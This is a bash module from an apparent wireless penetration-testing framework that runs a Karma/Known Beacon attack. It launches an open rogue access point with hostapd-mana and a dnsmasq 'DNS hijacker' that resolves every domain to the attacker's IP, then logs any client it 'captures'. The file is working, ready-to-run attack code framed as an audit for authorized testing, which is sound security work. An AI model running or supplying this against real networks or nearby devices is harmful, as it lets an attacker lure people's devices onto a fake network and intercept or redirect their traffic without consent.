#!/usr/bin/env bash
# MODULE_META
# NAME="PineAP / Karma Attack"
# CATEGORY="F"
# DEPS="A1"
# CRITICAL="no"
# TOOLS="hostapd-mana,dnsmasq,mdk4"
# DESC="Test client susceptibility to Karma/Loud AP attacks (responding to all probes)"
# REQS="managed_iface,nat"
# PCAP="yes"
# DECODE="dhcp"

#===============================================================================
#  modules/f2_pineap_karma.sh
#  F2: PineAP / Karma Attack (Golden Wrapper)
#
#  METHODOLOGY (SPEC ALIGNED):
#  1. Deploy a rogue Access Point using 'hostapd-mana'.
#  2. Interactive selection: Dynamic Karma vs. Static Known Beacon Attack.
#  3. Provide DHCP/DNS services via dnsmasq (Go-Core NAT).
#===============================================================================

set -euo pipefail

C_PROMPT="${ASTRA_COLOR_PROMPT:-}"
C_VAR="${ASTRA_COLOR_VAR:-}"
C_BOLD="${ASTRA_COLOR_BOLD:-}"
C_ACTION="${ASTRA_COLOR_ACTION:-}"
C_RESET="${ASTRA_COLOR_RESET:-}"

# SNR Safeguard (Red Team Hardening)
if [[ "${ASTRA_TARGET_RSSI:-0}" -ne 0 ]] && [[ "${ASTRA_TARGET_RSSI:-0}" -lt -75 ]]; then
    echo -e "\n${C_PROMPT}[!] WARNING:${C_RESET} ${C_BOLD}Low Signal Strength Detected (${ASTRA_TARGET_RSSI}dBm).${C_RESET}"
    echo -e "[*] Karma responses may not reach victims with sufficient SNR to trigger association."
    stty sane
    read -p "$(echo -e "${C_ACTION} [?] Continue anyway? [y/N]: ${C_RESET}")" snr_continue
    [[ "$snr_continue" != "y" ]] && exit 0
fi

# Inputs from Environment
# ...

if [[ -z "$INTERFACE" ]]; then
    echo "[!] WIFI_INTERFACE not set."
    exit 1
fi

echo -e "${C_PROMPT}[*]${C_RESET} Initializing Karma tactical options..."

# 1. Interactive Selection
echo -e "${C_PROMPT}[?]${C_RESET} ${C_BOLD}Select Karma Vector:${C_RESET}"
echo "    1) Dynamic MANA (Respond to directed probes only)"
echo "    2) Known Beacon Attack (Broadcast top SSIDs to catch passive scanners)"
stty sane
read -p "$(echo -e "${C_ACTION} Selection [1/2]: ${C_RESET}")" vector_choice

MANA_LOUD="0"
if [[ "$vector_choice" == "1" ]]; then
    echo -e "\n${C_PROMPT}[!] MODERNITY ALERT:${C_RESET} ${C_BOLD}Dynamic MANA is obsolete against iOS 15+ and Android 12+.${C_RESET}"
    echo -e "[*] Recommended for legacy IoT or technical debt targets only."
elif [[ "$vector_choice" == "2" ]]; then
    echo -e "[*] Enabling ${C_VAR}Known Beacon Attack${C_RESET} (Loud AP Mode)..."
    MANA_LOUD="1"
fi

# 2. Configuration
MANA_CONF="${EVIDENCE_PREFIX}_mana.conf"
DNSMASQ_CONF="${EVIDENCE_PREFIX}_dnsmasq.conf"
MANA_LOG="${EVIDENCE_DIR}/${TC_ID}_mana.log"
DNSMASQ_LOG="${EVIDENCE_DIR}/${TC_ID}_dnsmasq.log"

cat <<EOF > "$MANA_CONF"
interface=$INTERFACE
driver=nl80211
ssid=GuestWiFi
hw_mode=g
channel=6
auth_algs=1
wpa=0
mana_wpe=1
mana_loud=$MANA_LOUD
mana_cross_cmds=1
EOF

cat <<EOF > "$DNSMASQ_CONF"
interface=$INTERFACE
dhcp-range=192.168.44.10,192.168.44.100,12h
dhcp-option=3,$INTERNAL_IP
dhcp-option=6,$INTERNAL_IP
address=/#/$INTERNAL_IP
log-queries
log-dhcp
EOF

# 3. Execution
cleanup() {
    echo "[*] Cleaning up Karma processes..."
    [[ -n "${MANA_PID:-}" ]] && kill "$MANA_PID" 2>/dev/null || true
    [[ -n "${DNSMASQ_PID:-}" ]] && kill "$DNSMASQ_PID" 2>/dev/null || true
}
trap cleanup EXIT

echo "[*] Starting DNS hijacker..."
dnsmasq -C "$DNSMASQ_CONF" -k --log-facility="$DNSMASQ_LOG" &
DNSMASQ_PID=$!

if command -v hostapd-mana &>/dev/null; then
    echo "[*] Starting hostapd-mana..."
    hostapd-mana "$MANA_CONF" > "$MANA_LOG" 2>&1 &
    MANA_PID=$!
    
    echo "[*] Karma attack running for ${SCAN_TIME}s..."
    ELAPSED=0
    while [[ $ELAPSED -lt $SCAN_TIME ]]; do
        PERCENT=$(( ELAPSED * 100 / SCAN_TIME ))
        STATUS="Karma active (monitoring probes)... ($(( SCAN_TIME - ELAPSED ))s left)"
        "$ASTRA_BIN" record-progress --session-dir "$SESSION_DIR" --tc "$TC_ID" --percent "$PERCENT" --status "$STATUS"
        
        sleep 5
        ((ELAPSED+=5))
    done
    
    cleanup
    trap - EXIT
    
    # 4. Reporting
    if grep -qi "authenticated" "$MANA_LOG"; then
        V_MAC=$(grep -i "authenticated" "$MANA_LOG" | awk '{print $3}' | head -1)
        echo "[!] SUCCESS: CLIENT CAPTURED VIA KARMA!"
        "$ASTRA_BIN" record-finding \
            --session-dir "$SESSION_DIR" \
            --tc "$TC_ID" \
            --type vulnerability \
            --name "Karma Attack Susceptibility" \
            --severity CRITICAL \
            --desc "A client device (${V_MAC:-Unknown}) connected to a phantom SSID generated by the Karma attack (hostapd-mana)." \
            --target "Global" \
            --evidence "$MANA_LOG" \
            --rationale "Karma attacks exploit clients that broadcast their Preferred Network List (PNL). Susceptibility to this attack allows an attacker to intercept connections from clients searching for any open network they've used in the past."
    else
        echo "[+] Karma attack complete. No clients captured."
        "$ASTRA_BIN" record-finding \
            --session-dir "$SESSION_DIR" \
            --tc "$TC_ID" \
            --type vulnerability \
            --name "[F2] Audit Complete" \
            --severity INFO \
            --desc "Executed Karma attack using hostapd-mana for ${SCAN_TIME}s. No clients connected." \
            --target "Global" \
            --evidence "$MANA_LOG" \
            --rationale "Modern clients are increasingly resistant to basic Karma attacks. This audit confirms local clients are not leaking vulnerable probe requests."
    fi
else
    echo "[!] hostapd-mana not found. Skipping Karma test."
    exit 1
fi

exit 0
